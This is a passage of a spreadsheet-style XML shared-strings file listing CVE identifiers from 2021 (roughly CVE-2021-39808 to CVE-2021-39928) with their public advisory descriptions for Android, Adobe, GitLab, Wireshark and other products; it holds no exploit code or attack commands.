    <t>CVE-2021-39808</t>
  </si>
  <si>
    <t>In createNotificationChannelGroup of PreferencesHelper.java, there is a possible way for a service to run in foreground without user notification due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-209966086</t>
  </si>
  <si>
    <t>CVE-2021-39809</t>
  </si>
  <si>
    <t>In avrc_ctrl_pars_vendor_rsp of avrc_pars_ct.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12LAndroid ID: A-205837191</t>
  </si>
  <si>
    <t>CVE-2021-3981</t>
  </si>
  <si>
    <t>A flaw in grub2 was found where its configuration file, known as grub.cfg, is being created with the wrong permission set allowing non privileged users to read its content. This represents a low severity confidentiality issue, as those users can eventually read any encrypted passwords present in grub.cfg. This flaw affects grub2 2.06 and previous versions. This issue has been fixed in grub upstream but no version with the fix is currently released.</t>
  </si>
  <si>
    <t>CVE-2021-39812</t>
  </si>
  <si>
    <t>In TBD of TBD, there is a possible out of bounds read due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205522359References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39814</t>
  </si>
  <si>
    <t>In ppmp_validate_wsm of drm_fw.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-216792660References: N/A</t>
  </si>
  <si>
    <t>CVE-2021-39815</t>
  </si>
  <si>
    <t>The PowerVR GPU driver allows unprivileged apps to allocated pinned memory, unpin it (which makes it available to be freed), and continue using the page in GPU calls. No privileges required and this results in kernel memory corruption.Product: AndroidVersions: Android SoCAndroid ID: A-232440670</t>
  </si>
  <si>
    <t>CVE-2021-39816</t>
  </si>
  <si>
    <t>CVE-2021-39817</t>
  </si>
  <si>
    <t>CVE-2021-39818</t>
  </si>
  <si>
    <t>Adobe InCopy version 11.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious TIFF file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-39819</t>
  </si>
  <si>
    <t>Adobe InCopy version 11.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious XML file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-3982</t>
  </si>
  <si>
    <t>Linux distributions using CAP_SYS_NICE for gnome-shell may be exposed to a privilege escalation issue. An attacker, with low privilege permissions, may take advantage of the way CAP_SYS_NICE is currently implemented and eventually load code to increase its process scheduler priority leading to possible DoS of other services running in the same machine.</t>
  </si>
  <si>
    <t>CVE-2021-39820</t>
  </si>
  <si>
    <t>Adobe InDesign versions 16.3 (and earlier), and 16.3.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious TIFF file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-39821</t>
  </si>
  <si>
    <t>Adobe InDesign versions 16.3 (and earlier), and 16.3.1 (and earlier) are affected by an out-of-bounds read vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious TIF file.</t>
  </si>
  <si>
    <t>CVE-2021-39823</t>
  </si>
  <si>
    <t>Adobe svg-native-viewer 8182d14dfad5d1e10f53ed830328d7d9a3cfa96d and earlier versions are affected by a heap buffer overflow vulnerability due to insecure handling of a malicious .svg file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-39824</t>
  </si>
  <si>
    <t>Adobe Premiere Elements version 2021.2235820 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious png file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-39825</t>
  </si>
  <si>
    <t>Photoshop Elements versions 2021 build 19.0 (20210304.m.156367) (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious TTF file.</t>
  </si>
  <si>
    <t>CVE-2021-39826</t>
  </si>
  <si>
    <t>Adobe Digital Editions 4.5.11.187646 (and earlier) are affected by an arbitrary command execution vulnerability. An authenticated attacker could leverage this vulnerability to execute arbitrary commands. User interaction is required to abuse this vulnerability in that a user must open a maliciously crafted .epub file.</t>
  </si>
  <si>
    <t>CVE-2021-39827</t>
  </si>
  <si>
    <t>Adobe Digital Editions 4.5.11.187646 (and earlier) are affected by an arbitrary file write vulnerability in the Digital Editions installer. An authenticated attacker could leverage this vulnerability to write an arbitrary file to the system. User interaction is required before product installation to abuse this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-39828</t>
  </si>
  <si>
    <t>Adobe Digital Editions 4.5.11.187646 (and earlier) are affected by a privilege escalation vulnerability in the Digital Editions installer. An authenticated attacker could leverage this vulnerability to escalate privileges. User interaction is required before product installation to abuse this vulnerability.</t>
  </si>
  <si>
    <t>379</t>
  </si>
  <si>
    <t>CVE-2021-39829</t>
  </si>
  <si>
    <t>Adobe Framemaker versions 2019 Update 8 (and earlier) and 2020 Release Update 2 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious PDF file.</t>
  </si>
  <si>
    <t>CVE-2021-3983</t>
  </si>
  <si>
    <t>kimai2 is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</t>
  </si>
  <si>
    <t>CVE-2021-39830</t>
  </si>
  <si>
    <t>Adobe Framemaker versions 2019 Update 8 (and earlier) and 2020 Release Update 2 (and earlier) are affected by a memory corruption vulnerability due to insecure handling of a malicious PDF file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-39831</t>
  </si>
  <si>
    <t>CVE-2021-39832</t>
  </si>
  <si>
    <t>CVE-2021-39833</t>
  </si>
  <si>
    <t>Adobe Framemaker versions 2019 Update 8 (and earlier) and 2020 Release Update 2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious TIF file.</t>
  </si>
  <si>
    <t>CVE-2021-39834</t>
  </si>
  <si>
    <t>CVE-2021-39835</t>
  </si>
  <si>
    <t>Adobe Framemaker versions 2019 Update 8 (and earlier) and 2020 Release Update 2 (and earlier) are affected by a use-after-free vulnerability in the processing of a malformed PDF file that could result in disclosure of sensitive memory. Exploitation of this issue requires user interaction in that a victim must open a malicious PDF file.</t>
  </si>
  <si>
    <t>CVE-2021-39836</t>
  </si>
  <si>
    <t>Acrobat Reader DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by a use-after-free vulnerability in the processing of the AcroForm buttonGetIcon action that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-39837</t>
  </si>
  <si>
    <t>Acrobat Reader DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by a use-after-free vulnerability in the processing of the AcroForm deleteItemAt action that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-39838</t>
  </si>
  <si>
    <t>Acrobat Reader DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by a use-after-free vulnerability in the processing of the AcroForm buttonGetCaption action that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-39839</t>
  </si>
  <si>
    <t>Acrobat Reader DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by a use-after-free vulnerability in the processing of the AcroForm getItem action that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-3984</t>
  </si>
  <si>
    <t>CVE-2021-39840</t>
  </si>
  <si>
    <t>Acrobat Reader DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by a use-after-free vulnerability when processing AcroForms that could result in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-39841</t>
  </si>
  <si>
    <t>Acrobat Reader DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by a Type Confusion vulnerability. An attacker could leverage this vulnerability to execute arbitrary code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-39842</t>
  </si>
  <si>
    <t>Acrobat Reader DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by a use-after-free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-39843</t>
  </si>
  <si>
    <t>Acrobat Reader DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-39844</t>
  </si>
  <si>
    <t>Acrobat Reader DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of arbitrary memory information in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-39845</t>
  </si>
  <si>
    <t>Acrobat Reader DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by a stack overflow vulnerability due to insecure handling of a crafted PDF file, potentially resulting in memory corruption in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted PDF file in Acrobat Reader.</t>
  </si>
  <si>
    <t>CVE-2021-39846</t>
  </si>
  <si>
    <t>CVE-2021-39847</t>
  </si>
  <si>
    <t>XMP Toolkit SDK version 2020.1 (and earlier) is affected by a stack-based buffer overflow vulnerability potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-39849</t>
  </si>
  <si>
    <t>Acrobat Reader DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by a Null pointer dereference vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-3985</t>
  </si>
  <si>
    <t>CVE-2021-39850</t>
  </si>
  <si>
    <t>CVE-2021-39851</t>
  </si>
  <si>
    <t>CVE-2021-39852</t>
  </si>
  <si>
    <t>CVE-2021-39853</t>
  </si>
  <si>
    <t>CVE-2021-39854</t>
  </si>
  <si>
    <t>CVE-2021-39855</t>
  </si>
  <si>
    <t>Acrobat Reader DC ActiveX Control versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by an Information Disclosure vulnerability. An unauthenticated attacker could leverage this vulnerability to obtain NTLMv2 credentials. Exploitation of this issue requires user interaction in that a victim must open a maliciously crafted Microsoft Office file, or visit an attacker controlled web page.</t>
  </si>
  <si>
    <t>CVE-2021-39856</t>
  </si>
  <si>
    <t>Acrobat Reader DC ActiveX Control versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by an Information Disclosure vulnerability. An unauthenticated attacker could leverage this vulnerability to obtain NTLMv2 credentials. Exploitation of this issue requires user interaction in that a victim must visit an attacker controlled web page.</t>
  </si>
  <si>
    <t>CVE-2021-39857</t>
  </si>
  <si>
    <t>Adobe Acrobat Reader DC add-on for Internet Explorer versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by an Information Disclosure vulnerability. An unauthenticated attacker could leverage this vulnerability to check for existence of local files. Exploitation of this issue requires user interaction in that a victim must visit an attacker controlled web page.</t>
  </si>
  <si>
    <t>CVE-2021-39858</t>
  </si>
  <si>
    <t>CVE-2021-39860</t>
  </si>
  <si>
    <t>Acrobat Pro DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by a Null pointer dereference vulnerability. An unauthenticated attacker could leverage this vulnerability to disclose sensitive user memory. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-39861</t>
  </si>
  <si>
    <t>CVE-2021-39862</t>
  </si>
  <si>
    <t>Adobe Framemaker versions 2019 Update 8 (and earlier) and 2020 Release Update 2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-39863</t>
  </si>
  <si>
    <t>Acrobat Reader DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by a Buffer Overflow vulnerability when parsing a specially crafted PDF file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-39864</t>
  </si>
  <si>
    <t>Adobe Commerce versions 2.4.2-p2 (and earlier), 2.4.3 (and earlier) and 2.3.7p1 (and earlier) are affected by a cross-site request forgery (CSRF) vulnerability via a Wishlist Share Link. Successful exploitation could lead to unauthorized addition to customer cart by an unauthenticated attacker. Access to the admin console is not required for successful exploitation.</t>
  </si>
  <si>
    <t>CVE-2021-39865</t>
  </si>
  <si>
    <t>CVE-2021-39866</t>
  </si>
  <si>
    <t>A business logic error in the project deletion process in GitLab 13.6 and later allows persistent access via project access tokens.</t>
  </si>
  <si>
    <t>CVE-2021-39867</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE since version 8.15, a DNS rebinding vulnerability in Gitea Importer may be exploited by an attacker to trigger Server Side Request Forgery (SSRF) attacks.</t>
  </si>
  <si>
    <t>CVE-2021-39868</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE since version 8.12, an authenticated low-privileged malicious user may create a project with unlimited repository size by modifying values in a project export.</t>
  </si>
  <si>
    <t>CVE-2021-39869</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE since version 8.9, project exports may expose trigger tokens configured on that project.</t>
  </si>
  <si>
    <t>CVE-2021-39870</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE since version 11.11, an instance that has the setting to disable Repo by URL import enabled is bypassed by an attacker making a crafted API call.</t>
  </si>
  <si>
    <t>CVE-2021-39871</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE since version 13.0, an instance that has the setting to disable Bitbucket Server import enabled is bypassed by an attacker making a crafted API call.</t>
  </si>
  <si>
    <t>CVE-2021-39872</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE since version 14.1, an improper access control vulnerability allows users with expired password to still access GitLab through git and API through access tokens acquired before password expiration.</t>
  </si>
  <si>
    <t>CVE-2021-39873</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE, there exists a content spoofing vulnerability which may be leveraged by attackers to trick users into visiting a malicious website by spoofing the content in an error response.</t>
  </si>
  <si>
    <t>CVE-2021-39874</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE since version 11.0, the requirement to enforce 2FA is not honored when using git commands.</t>
  </si>
  <si>
    <t>CVE-2021-39875</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE since version 13.6, it is possible to see pending invitations of any public group or public project by visiting an API endpoint.</t>
  </si>
  <si>
    <t>CVE-2021-39876</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE since version 11.3, the endpoint for auto-completing Assignee discloses the members of private groups.</t>
  </si>
  <si>
    <t>CVE-2021-39877</t>
  </si>
  <si>
    <t>A vulnerability was discovered in GitLab starting with version 12.2 that allows an attacker to cause uncontrolled resource consumption with a specially crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-39878</t>
  </si>
  <si>
    <t>A stored Reflected Cross-Site Scripting vulnerability in the Jira integration in GitLab version 13.0 up to 14.3.1 allowed an attacker to execute arbitrary javascript code.</t>
  </si>
  <si>
    <t>CVE-2021-39879</t>
  </si>
  <si>
    <t>Missing authentication in all versions of GitLab CE/EE since version 7.11.0 allows an attacker with access to a victim's session to disable two-factor authentication</t>
  </si>
  <si>
    <t>CVE-2021-39880</t>
  </si>
  <si>
    <t>A Denial Of Service vulnerability in the apollo_upload_server Ruby gem in GitLab CE/EE all versions starting from 11.9 before 14.0.9, all versions starting from 14.1 before 14.1.4, and all versions starting from 14.2 before 14.2.2 allows an attacker to deny access to all users via specially crafted requests to the apollo_upload_server middleware.</t>
  </si>
  <si>
    <t>CVE-2021-39881</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE since version 7.7, the application may let a malicious user create an OAuth client application with arbitrary scope names which may allow the malicious user to trick unsuspecting users to authorize the malicious client application using the spoofed scope name and description.</t>
  </si>
  <si>
    <t>CVE-2021-39882</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE, provided a user ID, anonymous users can use a few endpoints to retrieve information about any GitLab user.</t>
  </si>
  <si>
    <t>CVE-2021-39883</t>
  </si>
  <si>
    <t>Improper authorization checks in all versions of GitLab EE starting from 13.11 before 14.1.7, all versions starting from 14.2 before 14.2.5, and all versions starting from 14.3 before 14.3.1 allows subgroup members to see epics from all parent subgroups.</t>
  </si>
  <si>
    <t>CVE-2021-39884</t>
  </si>
  <si>
    <t>In all versions of GitLab EE since version 8.13, an endpoint discloses names of private groups that have access to a project to low privileged users that are part of that project.</t>
  </si>
  <si>
    <t>CVE-2021-39885</t>
  </si>
  <si>
    <t>A Stored XSS in merge request creation page in all versions of Gitlab EE starting from 13.7 before 14.1.7, all versions starting from 14.2 before 14.2.5, and all versions starting from 14.3 before 14.3.1 allows an attacker to execute arbitrary JavaScript code on the victim's behalf via malicious approval rule names</t>
  </si>
  <si>
    <t>CVE-2021-39886</t>
  </si>
  <si>
    <t>Permissions rules were not applied while issues were moved between projects of the same group in GitLab versions starting with 10.6 and up to 14.1.7 allowing users to read confidential Epic references.</t>
  </si>
  <si>
    <t>CVE-2021-39887</t>
  </si>
  <si>
    <t>A stored Cross-Site Scripting vulnerability in the GitLab Flavored Markdown in GitLab CE/EE version 8.4 and above allowed an attacker to execute arbitrary JavaScript code on the victim's behalf.</t>
  </si>
  <si>
    <t>CVE-2021-39888</t>
  </si>
  <si>
    <t>In all versions of GitLab EE starting from 13.10 before 14.1.7, all versions starting from 14.2 before 14.2.5, and all versions starting from 14.3 before 14.3.1 a specific API endpoint may reveal details about a private group and other sensitive info inside issue and merge request templates.</t>
  </si>
  <si>
    <t>CVE-2021-39889</t>
  </si>
  <si>
    <t>In all versions of GitLab EE since version 14.1, due to an insecure direct object reference vulnerability, an endpoint may reveal the protected branch name to a malicious user who makes a crafted API call with the ID of the protected branch.</t>
  </si>
  <si>
    <t>CVE-2021-3989</t>
  </si>
  <si>
    <t>showdoc is vulnerable to URL Redirection to Untrusted Site</t>
  </si>
  <si>
    <t>CVE-2021-39890</t>
  </si>
  <si>
    <t>It was possible to bypass 2FA for LDAP users and access some specific pages with Basic Authentication in GitLab 14.1.1 and above.</t>
  </si>
  <si>
    <t>CVE-2021-39891</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE since version 8.0, access tokens created as part of admin's impersonation of a user are not cleared at the end of impersonation which may lead to unnecessary sensitive info disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-39892</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE since version 12.0, a lower privileged user can import users from projects that they don't have a maintainer role on and disclose email addresses of those users.</t>
  </si>
  <si>
    <t>CVE-2021-39893</t>
  </si>
  <si>
    <t>A potential DOS vulnerability was discovered in GitLab starting with version 9.1 that allowed parsing files without authorisation.</t>
  </si>
  <si>
    <t>CVE-2021-39894</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE since version 8.0, a DNS rebinding vulnerability exists in Fogbugz importer which may be used by attackers to exploit Server Side Request Forgery attacks.</t>
  </si>
  <si>
    <t>CVE-2021-39895</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE since version 8.0, an attacker can set the pipeline schedules to be active in a project export so when an unsuspecting owner imports that project, pipelines are active by default on that project. Under specialized conditions, this may lead to information disclosure if the project is imported from an untrusted source.</t>
  </si>
  <si>
    <t>CVE-2021-39896</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE since version 8.0, when an admin uses the impersonate feature twice and stops impersonating, the admin may be logged in as the second user they impersonated, which may lead to repudiation issues.</t>
  </si>
  <si>
    <t>CVE-2021-39897</t>
  </si>
  <si>
    <t>Improper access control in GitLab CE/EE version 10.5 and above allowed subgroup members with inherited access to a project from a parent group to still have access even after the subgroup is transferred</t>
  </si>
  <si>
    <t>CVE-2021-39898</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE since version 10.6, a project export leaks the external webhook token value which may allow access to the project which it was exported from.</t>
  </si>
  <si>
    <t>CVE-2021-39899</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE, an attacker with physical access to a user’s machine may brute force the user’s password via the change password function. There is a rate limit in place, but the attack may still be conducted by stealing the session id from the physical compromise of the account and splitting the attack over several IP addresses and passing in the compromised session value from these various locations.</t>
  </si>
  <si>
    <t>CVE-2021-3990</t>
  </si>
  <si>
    <t>CVE-2021-39900</t>
  </si>
  <si>
    <t>Information disclosure from SendEntry in GitLab starting with 10.8 allowed exposure of full URL of artifacts stored in object-storage with a temporary availability via Rails logs.</t>
  </si>
  <si>
    <t>CVE-2021-39901</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE since version 11.10, an admin of a group can see the SCIM token of that group by visiting a specific endpoint.</t>
  </si>
  <si>
    <t>CVE-2021-39902</t>
  </si>
  <si>
    <t>Incorrect Authorization in GitLab CE/EE 13.4 or above allows a user with guest membership in a project to modify the severity of an incident.</t>
  </si>
  <si>
    <t>CVE-2021-39903</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE since version 13.0, a privileged user, through an API call, can change the visibility level of a group or a project to a restricted option even after the instance administrator sets that visibility option as restricted in settings.</t>
  </si>
  <si>
    <t>CVE-2021-39904</t>
  </si>
  <si>
    <t>An Improper Access Control vulnerability in the GraphQL API in all versions of GitLab CE/EE starting from 13.1 before 14.2.6, all versions starting from 14.3 before 14.3.4, and all versions starting from 14.4 before 14.4.1 allows a Merge Request creator to resolve discussions and apply suggestions after a project owner has locked the Merge Request</t>
  </si>
  <si>
    <t>CVE-2021-39905</t>
  </si>
  <si>
    <t>An information disclosure vulnerability in the GitLab CE/EE API since version 8.9.6 allows a user to see basic information on private groups that a public project has been shared with</t>
  </si>
  <si>
    <t>CVE-2021-39906</t>
  </si>
  <si>
    <t>Improper validation of ipynb files in GitLab CE/EE version 13.5 and above allows an attacker to execute arbitrary JavaScript code on the victim's behalf.</t>
  </si>
  <si>
    <t>CVE-2021-39907</t>
  </si>
  <si>
    <t>A potential DOS vulnerability was discovered in GitLab CE/EE starting with version 13.7. The stripping of EXIF data from certain images resulted in high CPU usage.</t>
  </si>
  <si>
    <t>CVE-2021-39908</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE starting from 0.8.0 before 14.2.6, all versions starting from 14.3 before 14.3.4, and all versions starting from 14.4 before 14.4.1 certain Unicode characters can be abused to commit malicious code into projects without being noticed in merge request or source code viewer UI.</t>
  </si>
  <si>
    <t>CVE-2021-39909</t>
  </si>
  <si>
    <t>Lack of email address ownership verification in the CODEOWNERS feature in all versions of GitLab EE starting from 11.3 before 14.2.6, all versions starting from 14.3 before 14.3.4, and all versions starting from 14.4 before 14.4.1 allows an attacker to bypass CODEOWNERS Merge Request approval requirement under rare circumstances</t>
  </si>
  <si>
    <t>CVE-2021-39910</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.6 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2. GitLab was vulnerable to HTML Injection through the Swagger UI feature.</t>
  </si>
  <si>
    <t>CVE-2021-39911</t>
  </si>
  <si>
    <t>An improper access control flaw in all versions of GitLab CE/EE starting from 13.9 before 14.2.6, all versions starting from 14.3 before 14.3.4, and all versions starting from 14.4 before 14.4.1 exposes private email address of Issue and Merge Requests assignee to Webhook data consumers</t>
  </si>
  <si>
    <t>CVE-2021-39912</t>
  </si>
  <si>
    <t>A potential DoS vulnerability was discovered in GitLab CE/EE starting with version 13.7. Using a malformed TIFF images was possible to trigger memory exhaustion.</t>
  </si>
  <si>
    <t>CVE-2021-39913</t>
  </si>
  <si>
    <t>Accidental logging of system root password in the migration log in all versions of GitLab CE/EE before 14.2.6, all versions starting from 14.3 before 14.3.4, and all versions starting from 14.4 before 14.4.1 allows an attacker with local file system access to obtain system root-level privileges</t>
  </si>
  <si>
    <t>CVE-2021-39914</t>
  </si>
  <si>
    <t>A regular expression denial of service issue in GitLab versions 8.13 to 14.2.5, 14.3.0 to 14.3.3 and 14.4.0 could cause excessive usage of resources when a specially crafted username was used when provisioning a new user</t>
  </si>
  <si>
    <t>CVE-2021-39915</t>
  </si>
  <si>
    <t>Improper access control in the GraphQL API in GitLab CE/EE affecting all versions starting from 13.0 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2, allows an attacker to see the names of project access tokens on arbitrary projects</t>
  </si>
  <si>
    <t>CVE-2021-39916</t>
  </si>
  <si>
    <t>Lack of an access control check in the External Status Check feature allowed any authenticated user to retrieve the configuration of any External Status Check in GitLab EE starting from 14.1 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2.</t>
  </si>
  <si>
    <t>CVE-2021-39917</t>
  </si>
  <si>
    <t>An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.9 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2. A regular expression related to quick actions features was susceptible to catastrophic backtracking that could cause a DOS attack.</t>
  </si>
  <si>
    <t>CVE-2021-39918</t>
  </si>
  <si>
    <t>Incorrect Authorization in GitLab EE affecting all versions starting from 11.1 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2, allows a user to add comments to a vulnerability which cannot be accessed.</t>
  </si>
  <si>
    <t>CVE-2021-39919</t>
  </si>
  <si>
    <t>In all versions of GitLab CE/EE starting version 14.0 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2, the reset password token and new user email token are accidentally logged which may lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-3992</t>
  </si>
  <si>
    <t>kimai2 is vulnerable to Improper Access Control</t>
  </si>
  <si>
    <t>CVE-2021-39920</t>
  </si>
  <si>
    <t>NULL pointer exception in the IPPUSB dissector in Wireshark 3.4.0 to 3.4.9 allows denial of service via packet injection or crafted capture file</t>
  </si>
  <si>
    <t>CVE-2021-39921</t>
  </si>
  <si>
    <t>NULL pointer exception in the Modbus dissector in Wireshark 3.4.0 to 3.4.9 and 3.2.0 to 3.2.17 allows denial of service via packet injection or crafted capture file</t>
  </si>
  <si>
    <t>CVE-2021-39922</t>
  </si>
  <si>
    <t>Buffer overflow in the C12.22 dissector in Wireshark 3.4.0 to 3.4.9 and 3.2.0 to 3.2.17 allows denial of service via packet injection or crafted capture file</t>
  </si>
  <si>
    <t>CVE-2021-39923</t>
  </si>
  <si>
    <t>Large loop in the PNRP dissector in Wireshark 3.4.0 to 3.4.9 and 3.2.0 to 3.2.17 allows denial of service via packet injection or crafted capture file</t>
  </si>
  <si>
    <t>CVE-2021-39924</t>
  </si>
  <si>
    <t>Large loop in the Bluetooth DHT dissector in Wireshark 3.4.0 to 3.4.9 and 3.2.0 to 3.2.17 allows denial of service via packet injection or crafted capture file</t>
  </si>
  <si>
    <t>CVE-2021-39925</t>
  </si>
  <si>
    <t>Buffer overflow in the Bluetooth SDP dissector in Wireshark 3.4.0 to 3.4.9 and 3.2.0 to 3.2.17 allows denial of service via packet injection or crafted capture file</t>
  </si>
  <si>
    <t>CVE-2021-39926</t>
  </si>
  <si>
    <t>Buffer overflow in the Bluetooth HCI_ISO dissector in Wireshark 3.4.0 to 3.4.9 allows denial of service via packet injection or crafted capture file</t>
  </si>
  <si>
    <t>CVE-2021-39927</t>
  </si>
  <si>
    <t>Server side request forgery protections in GitLab CE/EE versions between 8.4 and 14.4.4, between 14.5.0 and 14.5.2, and between 14.6.0 and 14.6.1 would fail to protect against attacks sending requests to localhost on port 80 or 443 if GitLab was configured to run on a port other than 80 or 443</t>
  </si>
  <si>
    <t>CVE-2021-39928</t>
  </si>
  <si>
